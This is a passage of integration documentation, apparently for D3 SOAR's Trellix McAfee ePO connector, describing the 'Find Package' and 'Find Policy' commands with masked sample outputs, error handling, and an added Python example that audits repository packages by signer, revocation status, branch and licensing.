\\t\\t\\tnull,\\r\\n\\t\\t\\t\\\"Licensed\\\",\\r\\n\\t\\t\\t\\\"licensed\\\"\\r\\n\\t\\t]\"",
  "id": "***************************************"[\\r\\n\\t\\t\\t\\\"*****_Current_Install_0000_1.6.0_*****\\\"\\r\\n\\t\\t]\"",
  "packageBranch": "\"[\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Previous\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Previous\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Previous\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Previous\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Previous\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\",\\r\\n\\t\\t\\t\\\"Current\\\"\\r\\n\\t\\t]\"",
  "packageId": "\"[\\r\\n\\t\\t\\t\\\"*****_0000_1.6.0_*****\\\"\\r\\n\\t\\t]\"",
  "packageType": "\"[\\r\\n\\t\\t\\t\\\"Install\\\"]\"",
  "productDetectionPlatformID": "\"[\\r\\n\\t\\t\\t\\\"*****\\\"]\"",
  "productID": "\"[\\r\\n\\t\\t\\t\\\"*****\\\",\\r\\n\\t\\t\\t\\\"*****\\\",\\r\\n\\t\\t\\t\\\"*****\\\",\\r\\n\\t\\t\\t\\\"*****\\\"]\"",
  "productName": "\"[\\r\\n\\t\\t\\t\\\"Product Improvement Program\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Platform\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention for Mac\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall for Mac\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Web Control for Mac\\\",\\r\\n\\t\\t\\t\\\"McAfee Data Loss Prevention - Device Control\\\",\\r\\n\\t\\t\\t\\\"McAfee Agent for Windows\\\",\\r\\n\\t\\t\\t\\\"McAfee Agent for Windows\\\",\\r\\n\\t\\t\\t\\\"McAfee Endpoint Security for Linux Threat Prevention\\\",\\r\\n\\t\\t\\t\\\"McAfee Client Proxy\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Prevention\\\",\\r\\n\\t\\t\\t\\\"MVISION EDR Agent\\\",\\r\\n\\t\\t\\t\\\"MVISION EDR Endpoint Snapshot Tool (x64)\\\",\\r\\n\\t\\t\\t\\\"MVISION EDR Endpoint Snapshot Tool (x86)\\\",\\r\\n\\t\\t\\t\\\"DXL Platform\\\",\\r\\n\\t\\t\\t\\\"Data Exchange Layer Broker\\\",\\r\\n\\t\\t\\t\\\"McAfee Agent for LINUX\\\",\\r\\n\\t\\t\\t\\\"McAfee Agent for MAC\\\",\\r\\n\\t\\t\\t\\\"Threat Intelligence Exchange module for VirusScan Enterprise\\\",\\r\\n\\t\\t\\t\\\"TIE Server\\\",\\r\\n\\t\\t\\t\\\"TIE Platform\\\",\\r\\n\\t\\t\\t\\\"McAfee Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Aggregator\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Aggregator\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Server\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response Server\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Threat Intelligence\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Discover Server\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Server\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP Server\\\",\\r\\n\\t\\t\\t\\\"McAfee Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"McAfee Data Loss Prevention\\\",\\r\\n\\t\\t\\t\\\"McAfee DLP OCR Add-on\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall\\\",\\r\\n\\t\\t\\t\\\"Endpoint 
Security Web Control\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Platform\\\",\\r\\n\\t\\t\\t\\\"Solidcore Client for Windows\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Adaptive Threat Protection\\\",\\r\\n\\t\\t\\t\\\"SIEM Collector\\\",\\r\\n\\t\\t\\t\\\"McAfee DVM Engine for Windows\\\",\\r\\n\\t\\t\\t\\\"McAfee DAM Sensor for Windows\\\",\\r\\n\\t\\t\\t\\\"McAfee Active Response\\\"\\r\\n\\t\\t]\"",
  "signerName": "\"[\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\",\\r\\n\\t\\t\\t\\\"McAfee\\\"\\r\\n\\t\\t]\"",
  "signingKeyHash": "\"[\\r\\n\\t\\t\\t\\\"*****=\\\",\\r\\n\\t\\t\\t\\\"w+*****=\\\",\\r\\n\\t\\t\\t\\\"w+*****=\\\"]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

EXISTSINCURRENT

DISTRIBUTIONTYPE

EXISTSINPREVIOUS

HIDDEN

PRODUCTID

PRODUCTDETECTIONPLATFORMID

CHECKINDATE

BUILDNUMBER

DATABASEAUTOID

PACKAGETYPE

PRODUCTNAME

SIGNERNAME

EVALUATION

HASHCODE

ID

KEYTYPE

CONFLICTINGPACKAGEITEMS

SIGNINGKEYHASH

DEPLOYMENTPATH

UNKNOWNDISTRIBUTIONTYPE

LICENSED

EXISTSINEVALUATION

PACKAGEID

DEPENDENCYPRODUCTID

PACKAGETOTALSIZE

APPLICABLEFORGLOBALUPDATING

PACKAGELANGID

HOTFIXVERSION

PRODUCTDETECTIONPRODUCTVERSION

REVOKEDSTATUS

MANAGEDPKGDEPENDENCYLIST

ENGINEVERSION64

PACKAGEBRANCH

PRODUCTPLATFORM

Licensed

False

T*****

W*****

2/14/2018 1:10:22 PM

6***

0

Install

Product Improvement Program

McAfee

False

1*****

TELEMTRY1000_Current_Install_0000_1.6.0_*****

0

[]

H*****=

False

True

T*****_Current_Install_0000_1.6.0_*****

2763

False

0000

623

1.6.0

False

Current

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including the Failure Indicator, Status Code, and Message. These details can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
| --- | --- | --- |
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Find Package failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

Find Package failed.

Status Code: 401.

Message: Unauthorized.
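The Find Package Raw Data carries fields a playbook can use to review the Master Repository before a deployment task runs. The following is an added example, not code from D3 or Trellix: it flags packages by `revokedStatus`, `signerName`, `packageBranch`, `licensed` and `evaluation`. The field meanings are assumed from their names, the signer allowlist is an operator-supplied assumption, and the sample records and package IDs are constructed.

```python
import json

# Constructed records using field names from the Raw Data sample on this page.
SAMPLE_RAW_DATA = json.loads("""
[
  {"packageId": "EXAMPLE_PKG_A", "productName": "Endpoint Security Firewall",
   "signerName": "McAfee", "revokedStatus": false, "packageBranch": "Current",
   "licensed": true, "evaluation": false},
  {"packageId": "EXAMPLE_PKG_B", "productName": "McAfee Agent for Windows",
   "signerName": "McAfee", "revokedStatus": false, "packageBranch": "Previous",
   "licensed": true, "evaluation": false},
  {"packageId": "EXAMPLE_PKG_C", "productName": "Example Tool",
   "signerName": "Example Signer", "revokedStatus": true,
   "packageBranch": "Current", "licensed": true, "evaluation": false}
]
""")


def audit_packages(packages, trusted_signers=("McAfee",),
                   expected_branch="Current"):
    """Return one finding per package that fails any review check.

    Missing fields are treated as failures: a package whose revocation
    status or signer is absent is reported instead of silently passing.
    """
    if isinstance(packages, dict):  # tolerate a single object
        packages = [packages]
    trusted = set(trusted_signers)  # exact match; no case folding
    findings = []
    for pkg in packages:
        reasons = []
        if pkg.get("revokedStatus") is not False:
            reasons.append("revoked, or revocation status missing")
        signer = pkg.get("signerName")
        if signer not in trusted:
            reasons.append(f"signer not in allowlist: {signer!r}")
        branch = pkg.get("packageBranch")
        if branch != expected_branch:
            reasons.append(f"branch is {branch!r}, expected {expected_branch!r}")
        if pkg.get("licensed") is not True or pkg.get("evaluation") is True:
            reasons.append("not a licensed, non-evaluation package")
        if reasons:
            findings.append({
                "packageId": pkg.get("packageId"),
                "productName": pkg.get("productName"),
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in audit_packages(SAMPLE_RAW_DATA):
        print(finding["packageId"], "-", "; ".join(finding["reasons"]))
```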

Find Policy

Retrieves ePO policies based on the provided search text.

Input

| Input Parameter | Required/Optional | Description | Example |
| --- | --- | --- | --- |
| Search Text | Optional | The search text defining the condition to retrieve policies. | My Default |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "productId": "MARCOBA_META",
        "featureName": "MARCOBA_META",
        "typeName": "General",
        "objectName": "My Default",
        "typeId": *****,
        "featureId": "MARCOBA_META",
        "objectId": *****,
        "productName": "Active Response 2.4.0",
        "objectNotes": ""
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "productId": "MARCOBA_META",
        "featureName": "MARCOBA_META",
        "typeName": "General",
        "objectName": "My Default",
        "typeId": *****,
        "featureId": "MARCOBA_META",
        "objectId": *****,
        "productName": "Active Response 2.4.0",
        "objectNotes": ""
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[{\\\"groupId\\\":2,\\\"groupPath\\\":\\\"My Organization\\\"},{\\\"groupId\\\":3,\\\"groupPath\\\":\\\"My Organization\\\\\\\\Lost and Found\\\"},{\\\"groupId\\\":4,\\\"groupPath\\\":\\\"My Organization\\\\\\\\Lost and Found\\\\\\\\WORKGROUP\\\"},{\\\"groupId\\\":5,\\\"groupPath\\\":\\\"My Organization\\\\\\\\d3cyber7.local\\\"},{\\\"groupId\\\":6,\\\"groupPath\\\":\\\"My Organization\\\\\\\\Lost and Found\\\\\\\\d3cyber7.local\\\"}]\\r\\n\"",
    "featureId": "\"[\\r\\n \\r\\n  \\\"MARCOBA_META\\\",\\r\\n \\r\\n  \\\"MARCOBA_META\\\",\\r\\n \\r\\n  \\\"assessment\\\",\\r\\n \\r\\n  \\\"assessment\\\",\\r\\n \\r\\n  \\\"assessment\\\",\\r\\n \\r\\n  \\\"assessment\\\",\\r\\n \\r\\n  \\\"MCA_____1000\\\",\\r\\n \\r\\n  \\\"UDLPSRVR2013\\\",\\r\\n \\r\\n  \\\"UDLPSRVR2013\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"TIEClientMETA\\\",\\r\\n \\r\\n  \\\"TIEClientMETA\\\",\\r\\n \\r\\n  \\\"TIEClientMETA\\\",\\r\\n \\r\\n  \\\"ENDP_GS_1000\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META_FW\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META_FW\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META_FW\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META_FW\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META_FW\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META_FW\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"MCPSRVER1000\\\",\\r\\n \\r\\n  \\\"DXLBROKRMETA\\\",\\r\\n \\r\\n  \\\"DXLBROKRMETA\\\",\\r\\n \\r\\n  \\\"DXLBROKRMETA\\\",\\r\\n \\r\\n  
\\\"DXLCLNT_META\\\",\\r\\n \\r\\n  \\\"DXLCLNT_META\\\",\\r\\n \\r\\n  \\\"DXLCLNT_META\\\",\\r\\n \\r\\n  \\\"TIEMGMT_META\\\",\\r\\n \\r\\n  \\\"TIEMGMT_META\\\",\\r\\n \\r\\n  \\\"MVEDR___META\\\",\\r\\n \\r\\n  \\\"MVEDR___META\\\",\\r\\n \\r\\n  \\\"TELEMTRY1000\\\",\\r\\n \\r\\n  \\\"TELEMTRY1000\\\"\\r\\n \\r\\n ]\"",
    "featureName": "\"[\\r\\n \\r\\n  \\\"MARCOBA_META\\\",\\r\\n \\r\\n  \\\"MARCOBA_META\\\",\\r\\n \\r\\n  \\\"Assessment\\\",\\r\\n \\r\\n  \\\"Assessment\\\",\\r\\n \\r\\n  \\\"Assessment\\\",\\r\\n \\r\\n  \\\"Assessment\\\",\\r\\n \\r\\n  \\\"Common Appliance Management\\\",\\r\\n \\r\\n  \\\"Data Loss Prevention\\\",\\r\\n \\r\\n  \\\"Data Loss Prevention\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\"Firewall\\\",\\r\\n \\r\\n  \\\"Firewall\\\",\\r\\n \\r\\n  \\\"Firewall\\\",\\r\\n \\r\\n  \\\"Firewall\\\",\\r\\n \\r\\n  \\\"Firewall\\\",\\r\\n \\r\\n  \\\"Firewall\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\"McAfee Agent\\\",\\r\\n \\r\\n  \\\"McAfee Agent\\\",\\r\\n \\r\\n  \\\"McAfee Agent\\\",\\r\\n \\r\\n  \\\"McAfee Agent\\\",\\r\\n \\r\\n  \\\"McAfee Agent\\\",\\r\\n \\r\\n  \\\"McAfee Agent\\\",\\r\\n \\r\\n 
 \\\"McAfee Client Proxy\\\",\\r\\n \\r\\n  \\\"McAfee DXL Broker Management\\\",\\r\\n \\r\\n  \\\"McAfee DXL Broker Management\\\",\\r\\n \\r\\n  \\\"McAfee DXL Broker Management\\\",\\r\\n \\r\\n  \\\"McAfee DXL Client\\\",\\r\\n \\r\\n  \\\"McAfee DXL Client\\\",\\r\\n \\r\\n  \\\"McAfee DXL Client\\\",\\r\\n \\r\\n  \\\"McAfee Threat Intelligence Exchange Server\\\",\\r\\n \\r\\n  \\\"McAfee Threat Intelligence Exchange Server\\\",\\r\\n \\r\\n  \\\"MVEDR___META\\\",\\r\\n \\r\\n  \\\"MVEDR___META\\\",\\r\\n \\r\\n  \\\"Product Improvement Program\\\",\\r\\n \\r\\n  \\\"Product Improvement Program\\\"\\r\\n \\r\\n ]\"",
    "objectId": "\"[\\r\\n \\r\\n  *****,\\r\\n \\r\\n  ***** ]\"",
    "objectName": "\"\\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim-2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default DLP Policy\\\",\\r\\n \\r\\n  \\\"My Default Server Configuration\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim-2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim-2)\\\",\\r\\n \\r\\n  \\\"My Default (DC2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim-2)\\\",\\r\\n \\r\\n  \\\"My Default (DC2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default(Tim)(2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim)\\\",\\r\\n \\r\\n  
\\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim)\\\",\\r\\n \\r\\n  \\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim)\\\"\\r\\n \\r\\n ]\"",
    "objectNotes": "\"\\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\"\\r\\n \\r\\n ]\"",
    "productId": "\"[\\r\\n \\r\\n  \\\"MARCOBA_META\\\",\\r\\n \\r\\n  \\\"MARCOBA_META\\\",\\r\\n \\r\\n  \\\"assessment\\\",\\r\\n \\r\\n  \\\"assessment\\\",\\r\\n \\r\\n  \\\"assessment\\\",\\r\\n \\r\\n  \\\"assessment\\\",\\r\\n \\r\\n  \\\"MCA_____1000\\\",\\r\\n \\r\\n  \\\"UDLPSRVR2013\\\",\\r\\n \\r\\n  \\\"UDLPSRVR2013\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"TIEClientMETA\\\",\\r\\n \\r\\n  \\\"TIEClientMETA\\\",\\r\\n \\r\\n  \\\"TIEClientMETA\\\",\\r\\n \\r\\n  \\\"ENDP_GS_1000\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META\\\",\\r\\n 